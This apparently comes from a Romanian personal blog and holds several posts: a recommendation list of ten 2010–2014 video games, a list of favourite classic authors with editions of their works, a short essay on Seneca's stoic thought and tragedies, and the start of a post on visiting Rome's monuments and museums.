10 JOCURI VIDEO pe care le RECOMAND

Revin cu un mic articol, dar de data asta, despre unul din inofensivele mele hobby-uri (un mic viciu) și anume, jocurile video. Să mă explic. În această perioadă grea, pe lângă poezii, monoloage și multă lectură… da, m-am mai și jucat la calculator. Nu m-am jucat atât de mult, unele jocuri fiind amintite din anii anteriori. La fel, anumite informații și bineînțeles, imaginile, au fost luate de pe google.

Am ales perioada 2010 (am zis să includ jocuri care deja sunt mai dezvoltate d.p.d.v. al graficii, poveștii, mecanicii, e.t.c.) până în anul 2014 (sincer, PC-ul meu cam până aici poate duce). Sigur, să nu uităm de jocurile frumoase ale „epocii de aur” ale jcurilor video, adică de prin 2004 (ex: Half Life 2) până prin 2009 (ex: Mafia 2). Nu am inclus jocuri tip strategie în această listă. Doar RPG / FPS.

NOTĂ: Eu nu sunt gammer de profesie. Nu sunt expert in PC-uri, în electronică, nu sunt critic de jocuri video. Tot ceea ce împărtășesc cu voi, este doar o părere personală. Eu consider că am ales jocuri video care totuși transmit o idee, un gând și încearcă niște sentimente, precum o carte bună, un film bun, un spectacol bun.

P.S. În lumea jocurilor video, îmi plac mult genurile: S.F. / Fantasy / Stealth (Sniper sau Thief build type characters) / Istorice.

Ca să nu mai lungim vorba:

HITMAN ABSOLUTION (2012)

de la IO INTERACTVIE

Am zis să încep cu ceva mișto. Și mi-am zis să încep cu seria Hitman. Sincer, la început, când am văzut trailer-ul, nu mi s-a părut interesant, și am zis să-l încerc. Cumva, după ce am jucat un pic, mi-am dat seama că e foarte fain.

Ce îmi place la acest joc? În primul rând că i s-a dat personajului principal o poveste, și una chiar emoționantă. Faptul că agentul 47 vrea să o salveze pe tânăra Victoria de la soarta pe care agenția (The Agency) i-a făurit-o. O altă caracteristică care îmi place, este noua mecanică a jocului. Cumva, plecând de la elementele de stealth (că poți să ascunzi corpul unuia în tomberon) a jocului anterior (Blood Money – 2006) la caracteristicile noi (faptul că nu mai ai voie să salvezi oriunde vrea mușchiul tău, ci doar în anumite puncte specifice – checkpoints / sau Point Shooting – ca să înțelegeți – e un fel de Dead Eye din RDR Redemption II). Restul, vă las pe voi să încercați.

PORTAL 2 (2011)

de la VALVE

Iată aici un joc, care poate fi comic, dramatic dar emoționant în același timp. După părerea mea, Portal 2 este singurul mare succes de la VALVE, după Half life 2 (2004), bineînțeles. Primul Portal (2007) nu mi s-a părut amre lucru, așa că am căutat despre Portal 2 și am văzut păreri bune. Așa că l-am încercat. Și, mamăăăă, ce mi-a plăcut. Este vorba despre piretenie, despre trădare.

În legătură cu povestea în sine, Portal 2 m-a făcut să-mi pun o grămadă de întrebări. (Sigur, nu este Open-World, dar sunt câteva secțiuni pe care le poți explora.) Micile arii secrete m-au făcut să mă întreb: Ce este defapt Aperture Sciene? Oare această companie oare este ceea ce pare? Și cel mai important ”Is the cake really a lie?” (nu dau spoiler pentru poveste, atât ajunge)

În ceea ce privește mecanica, gameplay-ul este simplu. Faci portaluri prin care călătorești și progresezi. Partea complicată sunt puzzle-urile, ah și clădirea care stă să se destrame.

MASS EFFECT 2 (2010)

de la BIOWARE

Mass Effect 2, este un exemplu bun când e vorba de ceea ce-mi place în jocurile video: povestea și evoluția personajelor în poveste și (poate ăsta e doar cazul meu) implicarea emoțională a jucătorului în poveste. Adică, așa cum am găcut eu, să iasă smooth totul.

Pentru mine, Mass Effect 2 este exemplul demn de menționat pentru ce înseamnă a fi loial. Nu doar loial ca și subaltern (squad în seria Mass Effect) dar și ca prieten. O rasă extraterestră care amenință rasa umană s-a mai întâlnit în filme și seriale, nu e ceva nou, însă unde m-am implicat eu și ceea ce mi-a trezit interesul pentru acest joc, culmea, sunt micile povești secundare din joc. Pentru ca toți membri echipajului să-i fie loial jucătorului, acesta din urmă trebuie să îndeplinească câte o misiune de loialitate fiecărui membru în parte. (Cine ar fi crezut că Miranda, care e femeia voluntară, bărbată, care îți dă impresia că e daor loială organizației Cerberus, are totusi un punct sensibil?)

În ceea ce privește mecanica, e mișto că, după misiunea de prolog, poți să-ți creezi caracterul (character custumazation – poți să-l faci Făt Frumos sau Muma Pădurii – ceea ce dă o notă de comic jocului). E shooter – deci împuști mercenari, extratereștrii, mașinării, ce este nevoie pentru a progresa. Camera este de tip Action Cam (Dead Space anyone?). Poți schimba armele, dacă faci rost de ele… mă rog, arme Sci Fi.

THE ELDER SCROLLS V: SKYRIM (2011)

de la BETHESDA

TES V: SKYRIM pentru mine este jocul tip Fantasy Number One. Este jocul în care, sincer, m-am distrat cel mai mult. La fel ca în multe jocuri tip character build, nu povestea principală m-a impresionat, cât micile quest-uri secundare. Sunt foarte faine, mai ales că te ajută să crești în level, să-ți atribui mai multe skill-uri și, de ce nu, să-ți faci un dulap întreg cu armuri rare. Vorba aia, haina face pe om.

(Țin și acum minte, când jucam Skyrim mai mult, m-am împrietenit cu toate rasele și cu toate orașele, am făcut muuuulte misiuni secundare, și m-am ales cu o garderobă impresionantă de armuri, pe care le-am păstrat la sediul meu – am ales College of Winterhold. Practic, eu în Skyrim am fost un colecționar de arme și armuri)

Poți juca Skyrim cum vrei: RPG sau FPS. Acesta este singurul joc unde am fost și una și alta. De obicei în spațiile deschise joc RPG iar în spațiile închise FPS.

FALLOUT: NEW VEGAS (2010)

de la BETHESDA

FALLOUT: NEW VEGAS, ca și Skyrim, este jocul S.F. number One. Este varianta S.F. al lui Skyrim, după părerea mea. Descrierea ar fi exact ca la Skyrim, dacă ar fi să vorbesc despre acest joc, doar cu un amănunt important în plus. Jocul m-a implicat emoțional, tot datorită poveștilor mici, secundare.

Orice gammer știe de seria Fallout. Nu am jucat decât Fallout 3 și New Vegas, dar New Vegas, pentru povestea și universul său, mi se pare unul dintre cele mai geniale jocuri făcute EVER!

FNV ne spunea povestea unui simplu CURIER care este lăsat să moară într-o groapă dintr-un cimitr din locul de unde începe jocul. Curierul este salvat și de aici începe misiunea de răzbunare și de recuperare a pachetului misterios, pentru care oamenii din universul post-apocaliptic sunt în stare să omoare. Ei bine, de aici, povestea se complică într-un asemenea hal.

FNV m-a învățat, din punct de vedere filosofic că War Never Changes. Men do, in the roads they walk (citat din DLC-ul Lonesome Road)

În ceea ce privește gameplay-ul: La fel ca la Skyrim. RPG sau FPS. Și am jucat exact ca la Skyrim.

BIOSHOCK INFINTE (2013)

de la 2K Games și Irrational Games

Avem aici un joc dintr-o serie pe care nu puteam să o omit. Seria Bioshock, și am ales, zic eu, cel mai frumos din serie: Bioshock Infinte, care , pentru mine, nu doar că este cel mai frumos din serie, dar este și unul dintre cele mai frumoase jocuri pe care le-am jucat vreodată. Este absolut memorabil. Acest joc nu daor că are o poveste superbă, dar și ideile filosofice pe care ți le imprimă sunt abolut demne de a reflecta. Jocul are această trăsătură științifică, totul fiind rezumat la univeruri paralele și fizică cuantică, și cum se pot întâlni universuri între ele. Ca să fie și mai emoționat, soundtrack-ul jocului este absolut genial. Acțiunea jocului are loc în orașul fictiv Columbia, care este și un oraș plutitor, deci este un univers utopic. Personajele principale sunt Booker DeWitt (jucătorul) și Elizabeth Cumstock. Un obiectiv simplu. Scoate-o pe Elizabeth din locul ăsta. Simplu …. Dar ce se complică treaba…

În ceea ce privește mecanica: FPS toată ziua. Și ce impușcături, ce efecte vizuale!

DISHONORED (2012)

de la BETHESDA

Dacă e să aleg un joc bazat pe minuțiozitate, mișcări bine planificate și gameplay smooth, unde să am opțiunea să folosesc cât mai puțină violență, alegerea mea este clar Dishonored. O poveste faină, cu gameplay fain.

Dishonored ne introduce în orașul fictiv Dunwall, unde Corvo Attano (jucătorul) este blamat pentru moartea reginei, el fiind bodyguard-ul ei personal. Aflăm că totul este o înscenare, iar scopul este to redeem yourself. Nu dau spoiler, dar acțiunea evoluează interesant, orașul este învăluit de obiective secundare și de mici povești. Și de adăugat epidemia adusă de șobolani. (sună un pic camusian). Din nou, reiau tema loialității și a trădării, ca la Portal 2.

Spre deosebire de Hitman care este tot un joc stealth, Dishonored este în totalitate FPS. Înafară de arme, jucătorul are posibilitatea și de a alege să crească în magie.

METRO: LAST LIGHT (2013)

de la DEEP SILVER

Pur și simplu nu pot să creez această listă, fără să adaug un joc din seria Metro, și am ales al doilea joc: Last Light.

Ca fapt: Seria de jocuri este ”ecranizarea” cărților lui Dimitri Glukovski

Waw… deși povestea este oarecum lineară și jocul pare a fi Open World, așa cum credeam eu, totuși m-a captivat. La maxim. Cumva, compar seria METRO cu FALLOUT. Dar dacă în Fallout vorbim de o Americă iradiată, aici vorbim de o rusie distrusă, la fel de monstruasă, ba chiar, cu mai multe elemente horror. Noroc că știam de la Fallout ce înspăimântătaore pot fi rețelele de metrou subterane. Stai, nu m-au ajutat mult, că m-am speriat de …. când am văzut cum e lumea Metro. Povestea este oarecum emoționantă, ba chair aș spune romantică, în unele secvențe.

Mecanica este ușoară. FPS în care jucătorul are opțiunea de weapon customization. Adică pui ce fel de țeavă la pușcă vrei: mică, mare… d-astea (eu am crea armă tip pușcă cu lunetă) dar ca să progresezi prin lumea iradiată, ai grijă să-ți păstrezi filtrele de aer. Niciodată nu știi când ai nevoie!

FAR CRY 3 (2012)

de la UBISOFT

Pănă acum, jocurile din această mică listă au fost de la Bethesda. Ei, acum spre final, trecem la compania mea preferată de jocuri, și anume Ubisoft.

Iar prima serie de la Ubisoft, care trebuie să mărturisesc, o ador, este seria Far Cry, iar jocul ales este Far Cry 3. De ce? Nu pentru poveste, de data asta, ci pentru personaje. Haideți, toată lumea îl știe pe Vaas, liderul piraților de pe insulă, care răpește oameni și îi vinde pentru sclavie. Este un personaj care a intrat in istoria personajelor de jocuri video.

Ceea ce mi-a plăcut la FAR CRY 3 este gameplay-ul. Este plăcut. Și grafica, vizualul mi se pare bun, te introduce în acea atmosferă de insulă de vacanță, atmosfera de mare și munte, de junglă. Iar animalele sălbatice, pot fi un chin pentru jucător.

ASSASSIN S CREED: ROGUE (2014)

de la UBISOFT

Iată, că am ajuns la jocul, pe care eu îl pun pe locul 1. AC ROGUE are, dup părerea mea, cea mai frumoasă poveste, din serie.

ROGUE, ne spune povestea lui Shay Patrick Cormac, care este asasinul care dezertează, și devine templier, după ce grupul de asasini îl pun pe Shay să investigheze niște săpături arheologice, ascunse sub o mănăstire din Lisabona. Shay, activează așa numitul precursor site, și dezlănțuie un cutremur uriaș, ce distruge o bună parte din Lisabona. Atunci Shay ințelege că, așa o putere mare nu este pentru oameni. Dar asasinii nu pot accepta asta, așa că el dezertează, și se duce la templieri, inamicii lor de secole întregi. Shay este un personaj frumos construit, cu o etică morală de excepție, un peronaj care nu a fost înțeles, dar cu toate astea, nu se dă bătut.

AC ROGUE pe mine m-a învățat, că unele lucruri e bine să rămână neatinse, precum că e bine să auzi și versiunea taberei celelalte. Este singurul joc în care templierii nu sunt așa răi decât par.

AC ROGUE mi se pare că are cele mai frumoase elemente vizuale, și un gameplay foarte plăcut, comenzi care te pot încurca, dar care sunt plăcut de descoperit.

 

Autori preferați din literatura clasică

Bună ziua! Nu am mai postat de mult timp pe acest blog. După cum se poate citi și în titlu, aceasta este o listă dedicată autorilor preferați din literatura clasică: română și universală. Această listă nu este un top, autorii i-am notat, după cum mi-a venit fiecare în mine, după operele lor de care mi-am amintit, pe rând.

Am dorit să fac această listă de ceva timp, din simpla dorință de a împărtăși, zic eu, niște lecturi superbe a unor opere care au rămas în mintea cititorilor și în ziua de astăzi. De unele cărți am făcut rost mai greu, altele se pot găsi în anticariate.

În această listă, am inclus, opere de toate genurile: poezie, proză, teatru – iar autorii, sunt în majoritate, cei care au scris de toate în ceea ce privește beletristica. La unii autori am menționat și eseistica.

Am adăugat câteva informații despre autor, informațiile fiind extrase de pe Wikipedia, pentru oameni care, poate, nu au auzit de anumiți autori, aflați în listă. Imaginile, bineînțeles, au fost și ele preluate de pe Google.

P.S. încă mă zbat să adun anumite opere ale unor scriitori, dar și să citesc cărți pe care nu le-am citit de la respectivii autori pe care îi adun în bibliotecă, și care, pe viitor sigur vor apărea și ei în această listă. Autori precum: Br. Nusik, N. Iorga, Cezar Petrescu, A.S. Puskin, Carlo Goldoni, Oscar Wilde, Ion Băieșu, W. Shakespeare (prea puține piese!) 

Așadar, începem:

Bertolt Brecht (1898 – 1956) a fost un dramaturg, poet, prozator și regizor german. A fost un inițiator al „teatrului epic”, promovând o nouă teorie și practică a teatrului, bazate pe efectul distanțării epice. A fost unul dintre cei care au revoluționat teatrul secolului XX.

 

– POEZIE: Legenda soldatului Mort (1918)

din volumul Versuri, ed. Tineretului, 1964, col. cele mai frumoase poezii

– PROZĂ: Socrate rănit

din vol. Povestiri din calendar, ed. pt. Lit. Univ. 1967

– TEATRU: Opera de trei Parale

Ascensiunea lui Arturo Ui poate fi oprită

din vol. Opera…, colecția BPT, 1967

Omul cel bun din Sâciuan

din vol. TEATRU, ed de stat pt Lit. și Artă, 1958

– ESEURI: Scrieri despre teatru, ed. Univers, 1977

 

Camil Petrescu (1894–1957) a fost un romancier, dramaturg, doctor în filozofie, nuvelist și poet. El pune capăt romanului tradițional și rămâne în literatura română, în special, ca inițiator al romanului modern.

 

– POEZIE: Versuri pentru ziua de atac

din vol. Opere I – Versuri, ed. pt. Lit., 1968

– TEATRU: Mitică Popescu (comedie)

ed Caietele Cetății Literare, 1928

Jocul Ielelor (dramă)

din vol. Jocul Ielelor / Suflete Tari…, ed. Curtea Veche, col. BPT – Jurnalul Național, 2010

– PROZĂ: Nuvele, ed ESPLA, 1956

– ESEURI: Doctrina Substanței, ed.Științifică, 1988

 

Albert Camus (1913- 1960) a fost un romancier, dramaturg și filozof francez, reprezentant al existențialismului. Camus califica astfel această primă reflecție asupra absurdului fundamental pentru condiția umană care trebuie să fie analizată, în scopul de a obține și de a merge dincolo de ea la o revoltă de succes, care ar trebui să conducă la un umanism, cum s-ar spune asta este o revoltă a sa pe condiția sa de a apropia Omul de alți Oameni, semenii săi.

 

– PROZĂ: Străinul (roman)

din vol. Străinul…, ed. RAO, 2008, col opere XX

– TEATRU: Caligula (dramă)

Neînțelegerea (dramă)

din vol. TEATRU, ed. RAO, 2004

– ESEURI: Mitul lui Sisif – din vol. Fața și Reversul, ed. RAO, 2004

 

Lucius Annaeus Seneca (4 î.Hr. – 65) a fost un filosof stoic roman, preceptor al împăratului Nero. Seneca a ocupat și funcții în administrația Imperiului. Originalitatea lui Seneca stă în pătrunderea cu care a surprins viciile și relele contemporanilor săi,  în locul acordat milei și omeniei față de sclavi, de gladiatori. Ideile sale au făcut ca el să fie consultat nu numai de filosofi, ci și de părinții Bisericii și de moraliștii creștini. Sinuciderea către care a fost împins a oferit un model celebru de stoicism în acțiune.

 

– TEATRU: Medeea (tragedie)

ed UNIVERS, col. Thalia, 1973

Phaedra (tragedie)

din vol. Tragedii vol I, ed. UNIVERS, col. Clu, 1979

Hercule scos din minți (tragedie)

din vol. Tragedii vol II, ed. UNIVERS, col. Clu, 1984

– ESEURI: Despre mânie – ed. Seneca Lucius Anaeus, col. în Doi, 2014

 

Victor Eftimiu (1889 – 1972) a fost un dramaturg, eseist, povestitor, scriitor și traducător român de origine macedoromână, respectiv membru al Academiei Române și francmason român din perioada interbelică. Începând cu anul 1912 publică povestiri, teatru, eseu, interviuri în presa franceză (cotidiene, reviste teatrale etc.). Piesele de teatru îi sunt jucate atât în România, cât și în Franța, Albania etc.

 

– POEZIE:  Murim și noi / Candele stinse

din vol. Versuri, ed Tineretului, 1964

– TEATRU: Înșir-te mărgărie (poem feeric)

Omul care a văzut moartea (comedie provincială)

Prometeu (tragedie)

din vol. Teatru, ed. E.S.P.L.A. , 1956

– PROZĂ: Spovedania unui Clovn / Omul din Bazin / Buchetul de trandafiri / Spovedania lui Hagi Tudose

din vol. Nuvele și Povestiri, ed. Cartea Românească, col. Mari Scriitori Români, 1989

Kimonoul înstelat (roman), ed. Crime Scene, 2012

 

Friedrich Dürrenmatt (1921 – 1990) a fost un dramaturg și prozator elvețian de talie europeană, care și-a scris opera în limba germană. A făcut studii de filozofie, literatură și teologie, dar și-a încercat talentul mai întâi ca grafician, tematica desenelor sale expresive prefigurând-o pe aceea a scrierilor de mai târziu. A fost permanent preocupat de confuzia de valori și de incertitudinile epocii în care trăia („azi nu mai există nici vinovați, nici oameni care să poarte răspunderea a ceva”). În opera lui un loc central îl ocupă problematica dreptății și îndurării, tratată în cheie tragicomică și grotescă. Cele mai multe din povestirile sale îmbracă forma literaturii polițiste. Ca dramaturg – unul din cei mai importanți de limbă germană din secolul XX – prefera comedia, considerând-o „unica formă dramatică ce mai poate exprima azi tragicul”.

 

– TEATRU: Romulus cel Mare (comedie)

Vizita bătrânei doamne (comedie tragică)

din vol. Romulus…, ed. pt. Lit. , col. BPT, 1965

Frank al V-lea, ed. UNIVERS, col. Thalia, 1973

– PROZĂ: Pana de automobil

ed Humanitas, col. Cartea de pe Noptieră, 2003

– ESEURI: Dramaturgice și critice, ed. Libra, 2001

 

Miguel de Unamuno (1864 – 1936) a fost un prozator, filozof, profesor, eseist, poet și dramaturg spaniol. Literatura sa n-a făcut altceva decât să ilustreze propria filozofie. Poezia reprezintă poate cea mai caldă și mai puțin speculativă parte a amplei sale creații. În multe din poemele sale, Unamuno sondează propriul „eu” liric prin parafrază autobiografică, prin trimiterea la întâmplări cărora le-a fost martor și care l-au ajutat să înțeleagă lumea și să și-o asume. Este zona în care filozoful Unamuno se retrage din fața întrebărilor metafizice, pentru a rămâne pur și necontrafăcut în lumina propriei sale conștiințe. Dacă proza sa s-a dovedit un domeniu apt să susțină convingerile sale filozofice, în piesele de teatru, Unamuno pornește de la afirmarea că ”lumea este teatru”, raportat continuu la experiența existențială.

 

– POEZIE: Poezii / Hristul lui Velasquez

din vol. Antologie Poetică, ed. Institutul European, col. INOROG, 2012

– TEATRU: Fedra

ed Ars Longa, 2010

– ESEURI: Secretul vieții

din vol. Secretul vieții și alte eseuri, ed. Humanitas, 2009

 

Vasile Voiculescu (1884 – 1963) a fost un scriitor și medic român. În domeniul literar s-a distins în principal ca poet, dramaturg și prozator.  Lirica sa din perioada interbelică se distinge prin puternice accente religioase, generate de convingerea că există Dumnezeu. Devine medic și doctor în medicină la București, ține la radio o serie de conferințe de medicină pentru țărani (emisiuni renumite), dar pasiunea pentru scris se amplifică. A scris și povestiri fantastice. În 1941 i-a fost conferit Premiul Național de poezie.

 

– POEZIE: Poezii, ed. Fundația Regală, 1944

Ultimele sonete ale lui Shakespeare, ed. Jurnalul Național, 2010, col. BPT

– PROZĂ: Iubire magică / Lostrița / Misiune de încredere

din vol. Povestiri, ed. Minerva, col. Patrimoniu, 1984

– TEATRU: Fata Ursului

Demiurgul

din vol. TEATRU, ed. Dacia Cluj, 1972

Trandafir Agățător

din vol. Opera Literară 3 – Dramaturgia, ed. Cartex, 2008

– ESEURI: Gânduri Albe, ed. Cartea Românească, 1986

 

Anton Pavlovici Cehov (1860-1904) a fost un medic, prozator și dramaturg rus. Cu un caracter foarte modest, care l-a însoțit de-a lungul vieții, Cehov nu și-a imaginat niciodată ce dimensiuni ar putea căpăta reputația sa postumă. Reacțiile publicului la piesele lui de teatru din anul morții au demonstrat cât de apreciat a fost scriitorul, atât în sufletul poporului rus, cât și pe plan internațional.

 

– PROZĂ: Salonul nr 6

din vol. Opere 5, ed. Univers, 1999

Ghinion / Un impresar sub canapea

din vol. Ghinion: Schițe Umoristice, ed. Universul S.A., 1945

– TEATRU: Ursul / Cerere în căsătorie / Tragedian fără voie / Livada de vișini

din vol. Opere 10 – Teatru, ed. Cartea Rusă, 1960

– ESEURI: Jurnal / Insula Sahalin

din vol. Opere 11, ed. Cartea Rusă, 1961

 

Liviu Rebreanu (1885 – 1944) a fost un prozator și dramaturg român. Înainte de a scrie și de a-și publica romanele, scriitorul și-a desăvârșit talentul scriind teatru, povestiri și nuvele. Rebreanu a început să scrie romane realiste, în care acțiunea avea loc în decorul unui sat din Transilvania, Rebreanu a readus problematica țărănească în centrul atenției lumii literare, prin romanul setei de pământ, Ion.

 

– PROZĂ: Proștii / Cearta / Mărturisire / Norocul

din vol. Golanii, ed. Albatros, 1984

Calvarul / Adam și Eva / Jar (romane)

– TEATRU: Cadrilul / Plicul / Randes-vous (comedii)

Osânda (dramă)

din vol. Opere 11 – Teatru, ed. Minerva, 1980

– ESEURI: Metropole ed. Cartea Românească, 1931

 

Karel Čapek (1890 – 1938) a fost un desenator, jurnalist, prozator și un dramaturg ceh, unul dintre cele mai populare nume ale literaturii cehe. Čapek este cel care a pus în circulație cuvântul „robot” în sensul modern al cuvântului, (deși acest termen a fost inițiat de fratele său, poetul Josef Capek, care a fost și el desenator și scenograf) în lucrarea sa R.U.R.. A scris schițe, romane, piese de teatru, eseuri.

 

– PROZĂ: Povestiri dintr-un buzunar / Povestiri din celălalt buzunar, ed. Curtea Veche, 2013

Cartea Apocrifelor (shițe și povestiri), ed. Humanitas, 2004, col. Cartea de pe Noptieră

Fabrica de absolut (roman), ed. Art, 2008, col. Art Clasic

– TEATRU: Tîlharul (comedie)

R.U.R (Rossom.s Universal Robots) – dramă în 3 acte / prolog comedie

Din viața Insectelor (comedie)

din vol. Teatru, E.P.L, 1968

– ESEURI: Cum se face teatru, cum se face film, ed. Meridiane, 1971

În captivitatea cuvintelor, ed. UNIVERS, col. Eseuri, 1982

 

Tudor Mușatescu (1903 – 1970) a fost un poet, prozator, dramaturg și umorist român. La maturitate, atât ca vârstă, cât și ca formație artistică, Tudor Mușatescu se dedică trup și suflet teatrului, în calitate de dramaturg, traducător, director de scenă, de conducător și proprietar de teatru. Criticii l-au considerat un fidel continuator, în perioada interbelică, al comediei caragialene de moravuri, prin tipologie, situații și dialoguri spirituale.

 

– POEZIE: Vitrinele Toamnei

ed. Tipografia Gh. N. Vlădescu și Fiul, 1926

– TEATRU: Titanic Vals (comedie)

 Escu… (comedie)

 din vol. Teatru, ed. ESPLA col. Teatru, 1958

 Geamandura (comedie)

din vol. Scrieri vol 2 – Teatru 2, ed. Minerva, 1970

 

Jean-Baptiste Poquelin, cunoscut mai bine ca Molière (1622 – 1673), a fost un scriitor francez de teatru, director și actor, unul dintre maeștrii satirei comice. Organizator al asociației teatrale „L’Illustre Théâtre”, devenită din 1665 trupa lui Ludovic al XIV-lea, a desfășurat o vastă activitate teatrală. În opera sa dramatică în versuri și proză, a abordat modalități diferite ale comediei, epuizând întreaga gamă a mijloacelor comicului. Prin creația sa, a oferit comediei franceze, valoare autonomă în câteva capodopere prin care a inaugurat comedia de moravuri.

 

– TEATRU: Tartuffe

                    Don Juan

din vol. Opere Alese vol. 2, ed. E.S.P.L.A. , 1955

                    Avarul

din vol. Comedii, ed. pt. Lit., col. BPT, 1964

                    Prețioasele Ridicole

din vol. Teatru II, ed. Minerva, col BPT, 1974

                   Bolnavul închipuit

                   Școala Femeilor

din vol. Bolnavul…, ed. MondoRo, col. Teatru, 2014

                  Femeile Savante, ed. Albatros, col. Lyceum – Texte Comentate, 1974

 

Nikolai Vasilievici Gogol (1809 – 1852) a fost un prozator și dramaturg rus, născut în Ucraina. Gogol s-a afirmat ca un scriitor care urmărește să redea adevărul vieții, smulgând fără cruțare vălul somptuos de pe societatea nobiliaro-birocratică a timpului său.

 

– PROZĂ: Mantaua / Nasul / Însemnările unui Nebun, ed. Polirom, colecția Top 10+, 2012

Cum s-a certat Ivan Ivanovici cu Ivan Nichiforovici (nuvelă)

din vol. Opere 1, ed. UNIVERS, 1998

Suflete Moarte (roman/ poem în proză), ed. Polirom, colecția Top 10+, 2012

– TEATRU: Revizorul (comedie)

Căsătoria (comedie)

din vol. Opere vol. 4 – Opera Dramatică, ed. Cartea Rusă, 1957

– ESEURI : Spovedania unui autor

din vol. Opere vol. 6 –Scrisori / Articole,  ed. Cartea Rusă, 1958

 

Mihai Eminescu (1850 – 1889) a fost un poet, prozator și jurnalist român, socotit de cititorii români și de critica literară postumă drept cea mai importantă voce poetică din literatura română. Mihai Eminescu a recuperat temele tradiționale ale Romantismului european, gustul pentru trecut și pasiunea pentru istoria națională, nostalgia regresivă pentru copilărie, melancolia și cultivarea stărilor depresive, întoarcerea la natură. Poetul avea o bună educație filosofică, opera sa poetică fiind influențată de marile sisteme filosofice ale epocii sale, de filosofia antică, de marile sisteme de gândire ale romantismului.

 

– POEZIE: vol. Opere I – Poezii, de la ACADEMIA ROMÂNĂ, 2013

– PROZĂ: Sărmanul Dionis / Făt Frumos din lacrimă / Borta vântului

din vol. Proză, de la Jurnalul Național, 2010

– TEATRU: Decebal / Pacea pământului vine s-o ceară (drame istorice)

Gogu Tatii (comedie în proză – neterminată)

din vol. Opera Dramatică, lucrări originale, ed. Vestela, 2001

– ESEURI: Filosofie / Repertoriul nostru teatral

din vol. Opere III – Publicistică…, de la ACADEMIA ROMÂNĂ, 1999

 

 

SENECA – tragicul

a. Stoicismul

Stoicismul a fost o orientare complexă de gândire apărută la începutul epocii elenistice (sfârșitul sec. IV. î.Hr.) care s-a întins până în epoca imperială a Romei (sec. III d.Hr.) Stoicii învățau răbdarea, moderația, suportarea cu decență a loviturilor sorții. Afirmau necesitatea de a fi om atât în sărăcie cât și în bogăție, de a păstra demnitatea și cinstea cu orice preț.

b. Gândirea filozofică senecană:

Ca gânditor, Seneca (4 î.Hr. – 65 d.Hr.) este un moralist. Se ține departe de speculații. Nu se întreabă în ce constă natura binelui sau care este binele suprem. Filozofează cu principii în care cree în mod absolut, ceea ce face să nu le pună niciodată în discuție. Consideră că în actele vieții noastre trebuie să ne conformăm naturii iar modelul către care trebuie să tindem ca oameni, este acela al înțeleptului stoic. Acesta este o făptură liberă, împăcată în sine cu ceea ce-și poate da singură. Nu devine frenetic în fața fericirii, după cum nu-și pierde cumpătul în fața suferinței. În măsura în care se știe stăpân pe sine, se simte puternic și asupra universului. Seneca recomandă indulgența și bunătatea față de toți, chiar și față de sclavi, necesitatea egalității pentru toți oamenii. Există o egalitate naturală și nici o argumentare naturală n-ar putea vreodată s-o conteste. Nimeni n-are dreptul să se închidă în sine, să se absoarbă în întregime.

c. Dramaturgia senecană:

Teatrul reprezintă pentru Seneca un laborator de studiu și de experimentare a propriilor teorii filozofice. Tragediile lui Seneca, cu nota lor sentențioasă de natură să înlocuiască prin speculații abstracte efectele de teatru, n-au fost compuse pentru reprezentații scenice, ci pentru lecturi publice (ce constituiau la Roma o modă) și se potriveau în multe privințe criteriilor literare. Mulți exegeți ai teatrului senecan au reliefat au considerat că se află în fața unei opere de stângace imitație, destinată lecturilor publice, vehiculând teme filozofice netransfigurate dramatic.

Istoricul literar R. Pichon a reliefat componentele negative ale tragediei senecane: „slăbiciunea dramatică a pieselor” , „neverosimilitatea caracterelor” , „gustul alterat al stilului”. Scăderile sunt sunt justificate prin destinația pieselor pentru a fi citite în saloane, nu pentru a fi jucate pe scenă. Acțiunea este redusă, expresia dramatică înlănțuită din monologuri (ex: monologul Medeii sau al lui Hypolitus). Eroii povestesc, descriu, meditează, nu se confruntă scenic, ci se succed. Poetul nu are simțul logicii dramatice și nici simțul personajului verosimil. Acțiunea nu e progresivă, ci juxtapusă, iar eroii depășesc măsura umanului (ex: Medeea comite o crimă sinistră). Personajele tragediei senecane sunt concepute în strânsă legătură cu doctrina moralei stoice. Sunt construite antitetic, întruchipând, în grade diverse, virtutea și viciul. Seneca împinge binele până la sublim, răul până la oroare, analiza până la subtilitate. Monologul predomină chiar și atunci când eroii se întâlnesc pe scenă. Alteori, dialogul se poate descompune în monologuri autonome.

Bibliografie:

Seneca – MEDEEA, ed. UNIVERS, colecția Thalia, București, 1973
Seneca – TRAGEDII, vol. I, ed. UNIVERS, colecția Clu, București, 1979
Seneca – Despre Mânie, ed. Lucius Annaeus Seneca, colecția În Doi, București 2014
Zamfirescu, I. – Istoria Universală a teatrului, vol I. Antichitatea, ediția a II-a, ed. Aius, Craiova, 2001

Lecturi recomandate:

   

 

 

MUZEELE ROMEI

În perioada 22 – 28 septembrie, am călătorit la Roma, dorind să vizităm faimoasele sale muzee. Iată câteva locații pe care le-am vizitat și m-au impresionat, pe care le recomand. Cât am stat în aeroport ne-am făcut o listă cu monumentele pe care am vrut să le vizităm și ne-am documentat pe Internet despre istoricul fiecărui monument.

Fotografii: Mobilul personal

I. Colloseum + Arcul de Triumf + Columna lui Traian

 

a. Colloseum

Împaratul Vespasian, fondatorul dinastiei Flaviane, a început construcția Colosseumului în anul 72 d.Hr. Aceasta a fost încheiată în anul 80 d.Hr., la un an dupa moartea împăratului. Uriașul amfiteatru a fost construit în locul unui lac artificial, parte din marele parc construit de Nero în centrul Romei, care includea de asemenea și Domus Aurea, cât și statuia Colossus. Aceasta gigantica statuie a lui Nero, de 36 de metri înalțime, care îl prezenta pe împărat în chip de zeu al soarelui a dat numele actual al construcției – Colosseum.

b. Arcul de Triumf

Arcul de Triumf este un monument în forma de portic arcuit, cu una sau mai multe arcade, decorat bogat cu basoreliefuri și inscripții, amplasat pe o artera de circulație sau într-o piață, ridicat pentru a sarbatori o victorie militară (când pe sub el treceau cortegiile triumfale) sau în amintirea unui alt fapt însemnat.

c. Columna lui Traian

Columna lui Traian este un monument antic din Roma construit din ordinul împăratului Traian, pentru comemorarea victoriei sale în Dacia, care s-a pastrat pâna în zilele noastre. Monumentul se afla în Forul lui Traian, în imediata apropiere – la nord – de Forul roman. Terminată în 113, columna are exteriorul prevăzut cu un faimos basorelief sculptat, în forma de spirală, care reproduce artistic sub o forma epică razboaiele dintre romani și daci purtate de Traian pentru cucerirea Daciei.

d. Forul Roman

 

II. Muzeul Capitolini

